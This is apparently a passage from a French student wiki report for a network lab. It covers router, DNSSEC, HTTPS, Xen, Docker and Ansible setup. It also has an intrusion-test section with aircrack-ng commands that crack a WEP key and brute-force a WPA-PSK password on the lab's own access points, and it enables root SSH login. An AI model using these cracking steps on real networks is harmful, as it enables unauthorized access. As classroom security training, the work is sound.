  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52012</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52012"/>
				<updated>2020-01-05T15:08:20Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration du Routeur 1 (R1) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
